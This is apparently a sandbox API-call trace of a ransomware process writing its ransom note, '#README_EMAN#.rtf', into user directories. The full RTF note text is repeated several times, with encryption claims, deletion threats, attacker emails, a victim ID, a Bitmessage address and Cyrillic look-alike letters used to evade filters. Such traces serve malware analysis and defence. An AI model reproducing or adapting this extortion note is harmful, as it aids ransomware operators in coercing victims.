Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0289.235] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2462808, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n", lpUsedDefaultChar=0x0) returned 8717 [0289.235] WriteFile (in: hFile=0x2d4, lpBuffer=0x2462808*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2462808*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0289.236] CloseHandle (hObject=0x2d4) returned 1 [0289.236] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ko\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ko\\#readme_eman#.rtf")) returned 0xffffffff [0289.236] GetLastError () returned 0x2 [0289.236] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ko\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ko\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d4 [0289.237] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 